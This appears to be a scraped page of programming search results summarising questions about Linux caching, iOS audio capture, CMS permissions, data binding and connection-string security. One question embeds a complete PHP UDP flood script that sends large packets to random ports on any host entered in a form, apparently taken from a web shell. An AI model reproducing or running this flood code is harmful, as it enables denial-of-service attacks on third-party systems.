Search Results

Search found 8687 results on 348 pages for 'per fagrell'.

Page 316/348 | < Previous Page | 312 313 314 315 316 317 318 319 320 321 322 323  | Next Page >

  • How can I limit the cache used by copying so there is still memory available for other cache?

    - by Peter
    Basic situation: I am copying some NTFS disks in openSuSE. Each one is 2TB. When I do this, the system runs slow. My guesses: I believe it is likely due to caching. Linux decides to discard useful cache (eg. kde4 bloat, virtual machine disks, LibreOffice binaries, Thunderbird binaries, etc.) and instead fill all available memory (24 GB total) with stuff from the copying disks, which will be read only once, then written and never used again. So then any time I use these apps (or kde4), the disk needs to be read again, and reading the bloat off the disk again makes things freeze/hiccup. Due to the cache being gone and the fact that these bloated applications need lots of cache, this makes the system horribly slow. Since it is USB,the disk and disk controller are not the bottleneck, so using ionice does not make it faster. I believe it is the cache rather than just the motherboard going too slow, because if I stop everything copying, it still runs choppy for a while until it recaches everything. And if I restart the copying, it takes a minute before it is choppy again. But also, I can limit it to around 40 MB/s, and it runs faster again (not because it has the right things cached, but because the motherboard busses have lots of extra bandwidth for the system disks). I can fully accept a performance loss from my motherboard's IO capability being completely consumed (which is 100% used, meaning 0% wasted power which makes me happy), but I can't accept that this caching mechanism performs so terribly in this specific use case. # free total used free shared buffers cached Mem: 24731556 24531876 199680 0 8834056 12998916 -/+ buffers/cache: 2698904 22032652 Swap: 4194300 24764 4169536 I also tried the same thing on Ubuntu, which causes a total system hang instead. ;) And to clarify, I am not asking how to leave memory free for the "system", but for "cache". I know that cache memory is automatically given back to the system when needed, but my problem is that it is not reserved for caching of specific things. Question: Is there some way to tell these copy operations to limit memory usage so some important things remain cached, and therefore any slowdowns are a result of normal disk usage and not rereading the same commonly used files? For example, is there a setting of max memory per process/user/file system allowed to be used as cache/buffers?

    Read the article

  • How to configure the framesize using AudioUnit.framework on iOS

    - by Piperoman
    I have an audio app i need to capture mic samples to encode into mp3 with ffmpeg First configure the audio: /** * We need to specifie our format on which we want to work. * We use Linear PCM cause its uncompressed and we work on raw data. * for more informations check. * * We want 16 bits, 2 bytes (short bytes) per packet/frames at 8khz */ AudioStreamBasicDescription audioFormat; audioFormat.mSampleRate = SAMPLE_RATE; audioFormat.mFormatID = kAudioFormatLinearPCM; audioFormat.mFormatFlags = kAudioFormatFlagIsPacked | kAudioFormatFlagIsSignedInteger; audioFormat.mFramesPerPacket = 1; audioFormat.mChannelsPerFrame = 1; audioFormat.mBitsPerChannel = audioFormat.mChannelsPerFrame*sizeof(SInt16)*8; audioFormat.mBytesPerPacket = audioFormat.mChannelsPerFrame*sizeof(SInt16); audioFormat.mBytesPerFrame = audioFormat.mChannelsPerFrame*sizeof(SInt16); The recording callback is: static OSStatus recordingCallback(void *inRefCon, AudioUnitRenderActionFlags *ioActionFlags, const AudioTimeStamp *inTimeStamp, UInt32 inBusNumber, UInt32 inNumberFrames, AudioBufferList *ioData) { NSLog(@"Log record: %lu", inBusNumber); NSLog(@"Log record: %lu", inNumberFrames); NSLog(@"Log record: %lu", (UInt32)inTimeStamp); // the data gets rendered here AudioBuffer buffer; // a variable where we check the status OSStatus status; /** This is the reference to the object who owns the callback. */ AudioProcessor *audioProcessor = (__bridge AudioProcessor*) inRefCon; /** on this point we define the number of channels, which is mono for the iphone. the number of frames is usally 512 or 1024. */ buffer.mDataByteSize = inNumberFrames * sizeof(SInt16); // sample size buffer.mNumberChannels = 1; // one channel buffer.mData = malloc( inNumberFrames * sizeof(SInt16) ); // buffer size // we put our buffer into a bufferlist array for rendering AudioBufferList bufferList; bufferList.mNumberBuffers = 1; bufferList.mBuffers[0] = buffer; // render input and check for error status = AudioUnitRender([audioProcessor audioUnit], ioActionFlags, inTimeStamp, inBusNumber, inNumberFrames, &bufferList); [audioProcessor hasError:status:__FILE__:__LINE__]; // process the bufferlist in the audio processor [audioProcessor processBuffer:&bufferList]; // clean up the buffer free(bufferList.mBuffers[0].mData); //NSLog(@"RECORD"); return noErr; } With data: inBusNumber = 1 inNumberFrames = 1024 inTimeStamp = 80444304 // All the time same inTimeStamp, this is strange However, the framesize that i need to encode mp3 is 1152. How can i configure it? If i do buffering, that implies a delay, but i would like to avoid this because is a real time app. If i use this configuration, each buffer i get trash trailing samples, 1152 - 1024 = 128 bad samples. All samples are SInt16.

    Read the article

  • Good object/DB set-up for CMS-esque app for managing content and user permissions?

    - by sah302
    Hi all, so I am writing a big CMS-esque app to allow users to manage web content through web applications, I've got a pretty good db-driven user permission system going, but am having trouble coming up with a good way to handle content groups and pages, I've got a couple options and not sure which one to take. Furthermore, I am not sure how to handle static page updates that have no 'widgets' in them. My current set-up for permissions is this: Objects: User, UserGroup, UserUserGroup, UserGroupType Standard many to many relationship User -> UserUserGroup <- UserGroup each Usergroup has a UserGroupType, which could be anything from Title, Department, to PermissionGroup. PermissionGroup manages the permissions. Right now on a per page basis I check permissions based on their PermissionsGroups. So for a page which has CMS features for a news widget, I check for permission groups of "Site Admin" and "News Admin". Now the issue I am coming to is, the site has many different departments involved. No problem I think, I can just have a EntityContentGroup so any widget app can be used for any departments. So my HR department, each of their news items would be in the EntityContentGroup with the news item ID, and content group of "HR" or "HR News". But maybe this isn't the most efficient way to go about it? I don't want to put the content group simply as a NewsItemType because some news items could apply to multiple areas, so I want to be able to assign them to as many areas as I want. Likewise, all of my widget apps have this, so that's why I decided to choose EntityContentGroup and not just NewsItemContentGroup. I was also thinking well instead of doing a contentGroup do a Page object that says which page some entity should be on. It seems almost like the same thing, but would I want to use Page for something else? I was thinking Page would be used for static pages with no widgets, a simple Rich Text Editor can edit the content of that page and I save that item to a page?? And then instead of doing a page level check for UserGroup permissions, would it be better to associate a usergroup to a contentgroup, and then just depending on what contentGroup content on the page is displayed, determine the permissions through that relationship? Is that better? I am not sure at this point. I guess I am just getting a tad overwhelmed at this is the largest app in scope and size that I have ever written. What is the best approach for this based on my current user permission set-up?

    Read the article

  • Choosing a distributed shared memory solution

    - by mindas
    I have a task to build a prototype for a massively scalable distributed shared memory (DSM) app. The prototype would only serve as a proof-of-concept, but I want to spend my time most effectively by picking the components which would be used in the real solution later on. The aim of this solution is to take data input from an external source, churn it and make the result available for a number of frontends. Those "frontends" would just take the data from the cache and serve it without extra processing. The amount of frontend hits on this data can literally be millions per second. The data itself is very volatile; it can (and does) change quite rapidly. However the frontends should see "old" data until the newest has been processed and cached. The processing and writing is done by a single (redundant) node while other nodes only read the data. In other words: no read-through behaviour. I was looking into solutions like memcached however this particular one doesn't fulfil all our requirements which are listed below: The solution must at least have Java client API which is reasonably well maintained as the rest of app is written in Java and we are seasoned Java developers; The solution must be totally elastic: it should be possible to add new nodes without restarting other nodes in the cluster; The solution must be able to handle failover. Yes, I realize this means some overhead, but the overall served data size isn't big (1G max) so this shouldn't be a problem. By "failover" I mean seamless execution without hardcoding/changing server IP address(es) like in memcached clients when a node goes down; Ideally it should be possible to specify the degree of data overlapping (e.g. how many copies of the same data should be stored in the DSM cluster); There is no need to permanently store all the data but there might be a need of post-processing of some of the data (e.g. serialization to the DB). Price. Obviously we prefer free/open source but we're happy to pay a reasonable amount if a solution is worth it. In any way, paid 24hr/day support contract is a must. The whole thing has to be hosted in our data centers so SaaS offerings like Amazon SimpleDB are out of scope. We would only consider this if no other options would be available. Ideally the solution would be strictly consistent (as in CAP); however, eventual consistence can be considered as an option. Thanks in advance for any ideas.

    Read the article

  • Forcing a checkbox bound to a DataSource to update when it has not been viewed yet.

    - by Scott Chamberlain
    Here is a test framework to show what I am doing: create a new project add a tabbed control on tab 1 put a button on tab 2 put a check box paste this code for its code (use default names for controls) public partial class Form1 : Form { private List<bool> boolList = new List<bool>(); BindingSource bs = new BindingSource(); public Form1() { InitializeComponent(); boolList.Add(false); bs.DataSource = boolList; checkBox1.DataBindings.Add("Checked", bs, ""); this.button1.Click += new System.EventHandler(this.button1_Click); this.checkBox1.CheckedChanged += new System.EventHandler(this.checkBox1_CheckedChanged); } bool updating = false; private void button1_Click(object sender, EventArgs e) { updating = true; boolList[0] = true; bs.ResetBindings(false); Application.DoEvents(); updating = false; } private void checkBox1_CheckedChanged(object sender, EventArgs e) { if (!updating) MessageBox.Show("CheckChanged fired outside of updating"); } } The issue is if you run the program and look at tab 2 then press the button on tab 1 the program works as expected, however if you press the button on tab 1 then look at tab 2 the event for the checkbox will not fire untill you look at tab 2. The reason for this is the controll on tab 2 is not in the "created" state, so its binding to change the checkbox from unchecked to checked does not happen until after the control has been "Created". checkbox1.CreateControl() does not do anything because according to MSDN CreateControl does not create a control handle if the control's Visible property is false. You can either call the CreateHandle method or access the Handle property to create the control's handle regardless of the control's visibility, but in this case, no window handles are created for the control's children. I tried getting the value of Handle(there is no public CreateHandle() for CheckBox) but still the same result. Any suggestions other than have the program quickly flash all of my tabs that have data-bound check boxes when it first loads? EDIT-- per Jaxidian's suggestion I created a new class public class newcheckbox : CheckBox { public new void CreateHandle() { base.CreateHandle(); } } I call CreateHandle() right after updating = true same results as before.

    Read the article

  • How to measure a canvas that has auto height and with

    - by Wymmeroo
    Hi Folks, I'm a beginner in silverlight so i hope i can get an answer that brings me some more light in the measure process of silverlight. I found an interessting flap out control from silverlight slide control and now I try to use it in my project. So that the slide out is working proper, I have to place the user control on a canvas. The user control then uses for itself the height of its content. I just wanna change that behavior so that the height is set to the available space from the parent canvas. You see the uxBorder where the height is set. How can I measure the actual height and set it to the border? I tried it with Height={Binding ElementName=notificationCanvas, Path=ActualHeight} but this dependency property has no callback, so the actualHeight is never set. What I want to achieve is a usercontrol like the tweetboard per example on Jesse Liberty's blog Sorry for my English writing, I hope you understand my question. <Canvas x:Name="notificationCanvas" Background="Red"> <SlideEffectEx:SimpleSlideControl GripWidth="20" GripTitle="Task" GripHeight="100"> <Border x:Name="uxBorder" BorderThickness="2" CornerRadius="5" BorderBrush="DarkGray" Background="DarkGray" Padding="5" Width="300" Height="700" > <StackPanel> <TextBlock Text="Tasks"></TextBlock> <Button x:Name="btn1" Margin="5" Content="{Binding ElementName=MainBorder, Path=Height}"></Button> <Button x:Name="btn2" Margin="5" Content="Second Button"></Button> <Button x:Name="btn3" Margin="5" Content="Third Button"></Button> <Button x:Name="btn1_Copy" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy1" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy2" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy3" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy4" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy5" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy6" Margin="5" Content="First Button"/> </StackPanel> </Border> </SlideEffectEx:SimpleSlideControl>

    Read the article

  • get values from table as key value pairs with jquery

    - by liz
    I have a table: <table class="datatable" id="hosprates"> <caption> hospitalization rates test</caption> <thead> <tr> <th scope="col">Funding Source</th> <th scope="col">Alameda County</th> <th scope="col">California</th> </tr> </thead> <tbody> <tr> <th scope="row">Medi-Cal</th> <td>34.3</td> <td>32.3</td> </tr> <tr> <th scope="row">Private</th> <td>32.2</td> <td>34.2</td> </tr> <tr> <th scope="row">Other</th> <td>22.7</td> <td>21.7</td> </tr> </tbody> </table> i want to retrieve column 1 and column 2 values per row as pairs that end up looking like this [funding,number],[funding,number] i did this so far, but when i alert it, it only shows [object, object]... var myfunding = $('#hosprates tbody tr').each(function(){ var funding = new Object(); funding.name = $('#hosprates tbody tr td:nth-child(1)').map(function() { return $(this).text().match(/\S+/)[0]; }).get(); funding.value= $('#hosprates tbody tr td:nth-child(2)').map(function() { return $(this).text().match(/\S+/)[0]; }).get(); }); alert (myfunding);

    Read the article

  • How to keep multiple connectionString passwords safe, separate, and easy to deploy?

    - by Funka
    I know there are plenty of questions here already about this topic (I've read through as many as I could find), but I haven't yet been able to figure out how best to satisfy my particular criteria. Here are the goals: The ASP.NET application will run on a few different web servers, including localhost workstations for development. This means encrypting web.config using a machine key is out. The application will decide which connection string to use based on the server name (using a switch statement). For example, "localhost" and "dev.example.com" will use the DevDatabaseConnectionString, "test.example.com" will use the TestDatabaseConnectionString, and "www.example.com" will use the ProdDatabaseConnectionString, for example. Ideally, the exact same executables and web.config should be able to run on any of these environments, without needing to tailor or configure each environment separately every time that we deploy (something that seems like it would be easy to forget/mess up one day during a deployment, which is why we moved away from having just one connectionstring that has to be changed on each target). Deployment is currently accomplished via FTP. We will not have command-line access to the production web server. This means using aspnet_regiis.exe is out. (I could run on localhost, however, if this would still work.) We would prefer to not have to recompile the application whenever a password changes, so using web.config (or db.config or whatever) seems to make the most sense. A developer should not be able to decrypt the production database password. If a developer checks the source code out onto their localhost laptop (which would determine that it should be using the DevDatabaseConnectionString, remember?) and the laptop gets lost or stolen, it should not be possible to get at the other connection strings. Thus, having a single RSA private key to un-encrypt all three passwords cannot be considered. (Contrary to #3 above, it does seem like we'd need to have three separate key files if we went this route; these could be installed once per machine, and should the wrong key file get deployed to the wrong server, the worst that should happen is that the app can't decrypt anything---and not allow the wrong host to access the wrong database!) I know this is probably a subjective question (asking for a "best" way to do something), but given the criteria I've mentioned, I'm hoping that a single best answer will indeed arise. Thank you!

    Read the article

  • Criteria query returns hydrated object in SQLite but not SqlServer

    - by Berryl
    I have a method that returns a resource fully hydrated when the db is SQLite but when the identical code is used by SqlServer the object is not fully hydrated. I'll explain that with the code after some brief background. I my domain various otherwise unrelated things like an Employee or a Machine can be used as a Resource that can be allocated to. In the object model an example of this would be: /// <summary>Wraps a <see cref="StaffMember"/> in a <see cref="ResourceBase"/>. </summary> public class StaffMemberResource : ResourceBase { public virtual StaffMember StaffMember { get; private set; } public StaffMemberResource(StaffMember staffMember) { Check.RequireNotNull<StaffMember>(staffMember); base.BusinessId = staffMember.Number.ToString(); base.Name = staffMember.Name.ToString(); base.OrganizationName = staffMember.Department.Name; StaffMember = staffMember; } [UsedImplicitly] protected StaffMemberResource() { } } And in the db tables, there is a table per class inheritance where the ResourceBase has a discriminator and the id of the actual resource (ie, StaffMember) StaffMember - 1 ---- M- ResourceBase - 1 ----- M - Allocation The Code public override StaffMemberResource BuildResource(IActivityService activityService) { var sessionFactory = _GetSessionFactory(); var session = sessionFactory.GetCurrentSession(); StaffMemberResource result; using (var tx = session.BeginTransaction()) { var propertyName = ExprHelper.GetPropertyName<StaffMember>(x => x.Number); var staff = session.CreateCriteria<StaffMember>() .Add(Restrictions.Eq(propertyName, new EmployeeNumber(_testData.Resource_1.BusinessId))) .UniqueResult<StaffMember>(); if (staff == null) { ... build up a staff member result = new StaffMemberResource(staff); } else { ////////// var property = ExprHelper.GetPropertyName<StaffMemberResource>(x => x.StaffMember); result = session.CreateCriteria<StaffMemberResource>() .Add(Restrictions.Eq(property, staff)) .UniqueResult<StaffMemberResource>(); } /////////// tx.Commit(); } return result; } It's that second criteria query that works "properly" with SQLite but not with SqlServer. By properly I mean that the employee numer is translated into a ResourceBase.BusinessId, Name is flattened out into a ResourceBase.Name, etc. Does anyone know why this might be? Cheers, Berryl

    Read the article

  • Complex SQL query with group by and two rows in one

    - by Ricket
    Okay, I need help. I'm usually pretty good at SQL queries but this one baffles me. By the way, this is not a homework assignment, it's a real situation in an Access database and I've written the requirements below myself. Here is my table layout. It's in Access 2007 if that matters; I'm writing the query using SQL. Id (primary key) PersonID (foreign key) EventDate NumberOfCredits SuperCredits (boolean) There are events that people go to. They can earn normal credits, or super credits, or both at one event. The SuperCredits column is true if the row represents a number of super credits earned at the event, or false if it represents normal credits. So for example, if there is an event which person 174 attends, and they earn 3 normal credits and 1 super credit at the event, the following two rows would be added to the table: ID PersonID EventDate NumberOfCredits SuperCredits 1 174 1/1/2010 3 false 2 174 1/1/2010 1 true It is also possible that the person could have done two separate things at the event, so there might be more than two columns for one event, and it might look like this: ID PersonID EventDate NumberOfCredits SuperCredits 1 174 1/1/2010 1 false 2 174 1/1/2010 2 false 3 174 1/1/2010 1 true Now we want to print out a report. Here will be the columns of the report: PersonID LastEventDate NumberOfNormalCredits NumberOfSuperCredits The report will have one row per person. The row will show the latest event that the person attended, and the normal and super credits that the person earned at that event. What I am asking of you is to write, or help me write, the SQL query to SELECT the data and GROUP BY and SUM() and whatnot. Or, let me know if this is for some reason not possible, and how to organize my data to make it possible. This is extremely confusing and I understand if you do not take the time to puzzle through it. I've tried to simplify it as much as possible, but definitely ask any questions if you give it a shot and need clarification. I'll be trying to figure it out but I'm having a real hard time with it, this is grouping beyond my experience...

    Read the article

  • Python: Script works, but seems to deadlock after some time

    - by sberry2A
    I have the following script, which is working for the most part Link to PasteBin The script's job is to start a number of threads which in turn each start a subprocess with Popen. The output from each subprocess is as follows: 1 2 3 . . . n Done Bascially the subprocess is transferring 10M records from tables in one database to different tables in another db with a lot of data massaging/manipulation in between because of the different schemas. If the subprocess fails at any time in it's execution (bad records, duplicate primary keys, etc), or it completes successfully, it will output "Done\n". If there are no more records to select against for transfer then it will output "NO DATA\n" My intent was to create my script "tableTransfer.py" which would spawn a number of these processes, read their output, and in turn output information such as number of updates completed, time remaining, time elapsed, and number of transfers per second. I started running the process last night and checked in this morning to see it had deadlocked. There were not subprocceses running, there are still records to be updated, and the script had not exited. It was simply sitting there, no longer outputting the current information because no subprocces were running to update the total number complete which is what controls updates to the output. This is running on OS X. I am looking for three things: I would like to get rid of the possibility of this deadlock occurring so I don't need to check in on it as frequently. Is there some issue with locking? Am I doing this in a bad way (gThreading variable to control looping of spawning additional thread... etc.) I would appreciate some suggestions for improving my overall methodology. How should I handle ctrl-c exit? Right now I need to kill the process, but assume I should be able to use the signal module or other to catch the signal and kill the threads, is that right? I am not sure whether I should be pasting my entire script here, since I usually just paste snippets. Let me know if I should paste it here as well.

    Read the article

  • LINQ Query Returning Multiple Copies Of First Result

    - by Mike G
    I'm trying to figure out why a simple query in LINQ is returning odd results. I have a view defined in the database. It basically brings together several other tables and does some data munging. It really isn't anything special except for the fact that it deals with a large data set and can be a bit slow. I want to query this view based on a long. Two sample queries below show different queries to this view. var la = Runtime.OmsEntityContext.Positions.Where(p => p.AccountNumber == 12345678).ToList(); var deDa = Runtime.OmsEntityContext.Positions.Where(p => p.AccountNumber == 12345678).Select(p => new { p.AccountNumber, p.SecurityNumber, p.CUSIP }).ToList(); The first one should hand back a List. The second one will be a list of anonymous objects. When I do these queries in entities framework the first one will hand me back a list of results where they're all exactly the same. The second query will hand me back data where the account number is the one that I queried and the other values differ. This seems to do this on a per account number basis, ie if I were to query for one account number or another all the Position objects for one account would have the same value (the first one in the list of Positions for that account) and the second account would have a set of Position objects that all had the same value (again, the first one in it's list of Position objects). I can write SQL that is in effect the same as either of the two EF queries. They both come back with results (say four) that show the correct data, one account number with different securities numbers. Why does this happen??? Is there something that I could be doing wrong so that if I had four results for the first query above that the first record's data also appears in the 2-4th's objects??? I cannot fathom what would/could be causing this. I've searched Google for all kinds of keywords and haven't seen anyone with this issue. We partial class out the Positions class for added functionality (smart object) and some smart properties. There are even some constructors that provide some view model type support. None of this is invoked in the request (I'm 99% sure of this). However, we do this same pattern all over the app. The only thing I can think of is that the mapping in the EDMX is screwy. Is there a way that this would happen if the "primary keys" in the EDMX were not in fact unique given the way the view is constructed? I'm thinking that the dev who imported this model into the EDMX let the designer auto select what would be unique. Any help would give a haggered dev some hope!

    Read the article

  • Spring.NET & Immediacy CMS (or how to inject to server side controls without using PageHandlerFactor

    - by Simon Rice
    Is there any way to inject dependencies into an Immediacy CMS control using Spring.NET, ideally without having to use to ContextRegistry when initialising the control? Update, with my own answer The issue here is that Immediacy already has a handler defined in web.config that deals with all aspx pages, & so it's not possible add an entry for Spring.NET's PageHandlerFactory in web.config as per a normal webforms app. That rules out making the control implement ISupportsWebDependencyInjection. Furthermore, most of Immediacy's generated pages are aspx pages that don't physically exist on the drive. I have changed the title of the question to reflect this. What I have done to get Dependency Injection working is: Add the usual entries to web.config for Spring.NET as outlined in the documentation, except for the adding the entry to the <httpHandlers> section. In this case I've got my object definitions in Spring.config. Create the following abstract base class that will deal with all of the Dependency Injection work: DIControl.cs public abstract class DIControl : ImmediacyControl { protected virtual string DIName { get { return this.GetType().Name; } } protected override void OnInit(EventArgs e) { if (ContextRegistry.GetContext().GetObject(DIName, this.GetType()) != null) ContextRegistry.GetContext().ConfigureObject(this, DIName); base.OnInit(e); } } For non-immediacy controls, you can make this server side control inherit from Control or whatever subclass of that you like. For any control with which you wish to use with Spring.NET's Inversion of Control container, define it to inherit from DIControl & add the relelvant entry to Spring.config, for example: SampleControl.cs public class SampleControl : DIControl, INamingContainer { public string Text { get; set; } protected string InjectedText { get; set; } public SampleControl() : base() { Text = "Hello world"; } protected override void RenderContents(HtmlTextWriter output) { output.Write(string.Format("{0} {1}", Text, InjectedText)); } } Spring.config <objects xmlns="http://www.springframework.net"> <object id="SampleControl" type="MyProject.SampleControl, MyAssembly"> <property name="InjectedText" value="from Spring.NET" /> </object> </objects> You can optionally override DIName if you wish to name your entry in Spring.config differently from the name of your class. Provided everything's done correctly, you will have the control writing out "Hello world from Spring.NET!" when used in a page. This solution uses Spring.NET's ContextRegistry from within the control, but I would be surprised if there's no way around that for Immediacy at least since the page objects themselves aren't accessible. However, can this be improved at all from a Spring.NET perspective? Is there maybe an Immediacy plugin that already does this that I'm completely unaware of? Or is there an approach that does this in a more elegant way? I'm open to suggestions.

    Read the article

  • How to assign class property as display data member in datagridview

    - by KoolKabin
    hi guys, I am trying to display my data in datagridview. I created a class with different property and used its list as the datasource. it worked fine. but I got confused how to do that in case we have nested class. My Classes are as follows: class Category property UIN as integer property Name as string end class class item property uin as integer property name as string property mycategory as category end class my data list as follows: dim myDataList as list(of Item) = new List(of Item) myDataList.Add(new Item(1,"item1",new category(1,"cat1"))) myDataList.Add(new Item(2,"item2",new category(1,"cat1"))) myDataList.Add(new Item(3,"item3",new category(1,"cat1"))) myDataList.Add(new Item(4,"item4",new category(2,"cat2"))) myDataList.Add(new Item(5,"item5",new category(2,"cat2"))) myDataList.Add(new Item(6,"item6",new category(2,"cat2"))) Now I binded the datagridview control like: DGVMain.AutoGenerateColumns = False DGVMain.ColumnCount = 3 DGVMain.Columns(0).DataPropertyName = "UIN" DGVMain.Columns(0).HeaderText = "ID" DGVMain.Columns(1).DataPropertyName = "Name" DGVMain.Columns(1).HeaderText = "Name" DGVMain.Columns(2).DataPropertyName = "" **'here i want my category name** DGVMain.Columns(2).HeaderText = "category" DGVMain.datasource = myDataList DGVMain.refresh() I have tried using mycategory.name but it didn't worked. What can be done to get expected result? Is there any better idea other than this to accomplish the same task? Edited My question as per comment: I have checked the link given by u. It was nice n very usefull. Since the code was in c# i tried to convert it in vb. Everything went good but failed at a point of case sensitive and next one is that i had my nested class name itemcategory and my property name was category. there it arouse the problem. it didn't searched for category but it searched for itemcategory. so confused on it. My Code as follows: Private Sub DGVMain_CellFormatting(ByVal sender As Object, ByVal e As System.Windows.Forms.DataGridViewCellFormattingEventArgs) Handles DGVMain.CellFormatting Dim DGVMain As DataGridView = CType(sender, DataGridView) e.Value = EvaluateValue(DGVMain.Rows(e.RowIndex).DataBoundItem, DGVMain.Columns(e.ColumnIndex).DataPropertyName) End Sub Private Function EvaluateValue(ByRef myObj As Object, ByRef myProp As String) As String Dim Ret As String = "" Dim Props As System.Reflection.PropertyInfo() Dim PropA As System.Reflection.PropertyInfo Dim ObjA As Object If myProp.Contains(".") Then myProp = myProp.Substring(0, myProp.IndexOf(".")) Props = myObj.GetType().GetProperties() For Each PropA In Props ObjA = PropA.GetValue(myObj, New Object() {}) If ObjA.GetType().Name = myProp Then Ret = EvaluateValue(ObjA, myProp.Substring(myProp.IndexOf(".") + 1)) Exit For End If Next Else PropA = myObj.GetType().GetProperty(myProp) Ret = PropA.GetValue(myObj, New Object() {}).ToString() End If Return Ret End Function

    Read the article

  • Do sockets opened with fsockopen stay open after you leave the page via your browser?

    - by Rob
    if(isset($_GET['host'])&&is_numeric($_GET['time'])){ $pakits = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="act" value="phptools"> Host: <input type=text name=host value=localhost> Length (seconds): <input type=text name=time value=9999> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flood</b><br> <form action=? method=GET> <input type="hidden" name="act" value="phptools"> Host: <br><input type=text name=host value=localhost><br> Length (seconds): <br><input type=text name=time value=9999><br> <br> <input type=submit value=Go></form>'; } I've been looking around and asking my friends for awhile now, if I use this script to tell the server to open the sockets using fsockopen, if I leave the webpage will the sockets remain open until the duration is completed?

    Read the article

  • Consolidating coding styles: Funcs, private method, single method classes

    - by jdoig
    Hi all, We currently have 3 devs with, some, conflicting styles and I'm looking for a way to bring peace to the kingdom... The Coders: Foo 1: Likes to use Func's & Action's inside public methods. He uses actions to alias off lengthy method calls and Func's to perform simple tasks that can be expressed in 1 or 2 lines and will be used frequently through out the code Pros: The main body of his code is succinct and very readable, often with only one or 2 public methods per class and rarely any private methods. Cons: The start of methods contain blocks of lambda rich code that other developers don't enjoy reading; and, on occasion, can contain higher order functions that other dev's REALLY don't like reading. Foo 2: Likes to create a private method for (almost) everything the public method will have to do . Pros: Public methods remain small and readable (to all developers). Cons: Private methods are numerous. With private methods that call into other private methods, that call into... etc, etc. Making code hard to navigate. Foo 3: Likes to create a public class with a, single, public method for every, non-trivial, task that needs performing, then dependency inject them into other objects. Pros: Easily testable, easy to understand (one object, one responsibility). Cons: project gets littered by classes, opening multiple class files to understand what code does makes navigation awkward. It would be great to take the best of all these techniques... Foo-1 Has really nice, readable (almost dsl-like) code... for the most part, except for all the Action and Func lambda shenanigans bulked together at the start of a method. Foo-3 Has highly testable and extensible code that just feels a bit "belt-&-braces" for some solutions and has some code-navigation niggles (constantly hitting F12 in VS and opening 5 other .cs files to find out what a single method does). And Foo-2... Well I'm not sure I like anything about the one-huge .cs file with 2 public methods and 12 private ones, except for the fact it's easier for juniors to dig into. I admit I grossly over-simplified the explanations of those coding styles; but if any one knows of any patterns, practices or diplomatic-manoeuvres that can help unite our three developers (without just telling any of them to just "stop it!") that would be great. From a feasibility standpoint : Foo-1's style meets with the most resistance due to some developers finding lambda and/or Func's hard to read. Foo-2's style meets with a less resistance as it's just so easy to fall into. Foo-3's style requires the most forward thinking and is difficult to enforce when time is short. Any ideas on some coding styles or conventions that can make this work?

    Read the article

  • xml dom node children

    - by matt
    Need some help I've got lots of code and i want to make it shorter i know there's a way but I can't remember it this is code example: <?xml version="1.0" encoding="ISO-8859-1"?> <bookstore> <book category="cooking"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="children"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="web"> <title lang="en">XQuery Kick Start</title> <author>James McGovern</author> <author>Per Bothner</author> <author>Kurt Cagle</author> <author>James Linn</author> <author>Vaidyanathan Nagarajan</author> <year>2003</year> <price>49.99</price> </book> <book category="web" cover="paperback"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore As you can see the different nodes, children now is there a way to make this code smaller so I don't have to keep writing the nodes and children

    Read the article

  • How do I integrate a new MVC C# Project with an existing Web Forms VB.NET Web Application Project?

    - by Jordan Rieger
    We have a corporate website with a large amount of dynamic business application pages (e.g. Shopping Cart, Helpdesk, Product/Service management, Reporting, etc.) The site was built as an ASP.Net Web Application Project (WAP). Our systems have evolved over the years to use .NET 4.5 and various custom business logic DLLs (written in a mix of C# and VB.NET). However, the site itself is still using VB.NET Web Forms. We now have done a few side projects in MVC 4 using Razor/C#, and we want to use this framework for new pages on the main corporate site going forward. What would be the easiest way to achieve this? I found this nice list of steps to integrate MVC 4 into an existing Web Forms app. The problem is that because our existing app is a VB.NET WAP, it compiles into a single DLL, and .NET allows only one language per DLL. The site is way too big for us to contemplate converting it to C# all at once (yes, I've looked at the conversion tools, and they're good, but even 99% accuracy would leave us a huge amount of cleanup work.) I thought about converting the existing WAP into a Web Site Project (WSP) which does allow mixing languages and then following the steps above, but after a few pages of Google results, I couldn't find any steps for converting a WAP to WSP. (Plenty of sites offer the reverse steps: converting a WSP to a WAP.) Another idea I had was to create a completely separate MVC project, and then somehow squish them together into the same folder structure, where they would share the bin folder but compile to separate DLL's. I have no idea if this is possible, because certain files would collide (e.g. Global.asax, web.config, etc.) Finally, I can imagine a compromise solution where we keep all the MVC stuff in its own separate application under a subfolder of the main solution. We already use our own custom session state solution, so it wouldn't be difficult to pass data between the old site to the new pages. Which of the ideas above do you think makes the most sense for us? Is there another solution that I'm missing?

    Read the article

  • How To Create A Download Quota.

    - by snikolov
